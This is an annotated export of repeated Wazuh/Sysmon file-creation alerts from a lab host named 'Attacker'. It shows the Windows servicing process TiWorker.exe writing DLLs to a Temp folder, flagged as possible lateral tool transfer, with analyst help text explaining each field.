decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1426878Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260596
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.140 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\turbostack.dll CreationUtcTime: 2025-04-20 01:55:28.140 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.140
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\turbostack.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.140
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.305+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.305+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.661366
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1533935Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260597
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.152 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\updateagent.dll CreationUtcTime: 2025-04-20 01:55:28.152 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\updateagent.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.312+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.312+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.664347
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1725412Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260598
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.170 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\UpdateCompression.dll CreationUtcTime: 2025-04-20 01:55:28.170 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.170
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\UpdateCompression.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.170
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.363+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.363+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  16
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.667352
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.1824317Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260600
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.180 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wcp.dll CreationUtcTime: 2025-04-20 01:55:28.180 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.180
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wcp.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.180
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.390+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.390+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.670301
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2039426Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260601
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.202 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wdscore.dll CreationUtcTime: 2025-04-20 01:55:28.202 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.202
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wdscore.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.202
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.420+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.420+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  18
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.673266
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.2071612Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260602
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.205 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\wimgapi.dll CreationUtcTime: 2025-04-20 01:55:28.205 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.205
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\wimgapi.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.205
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.421+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
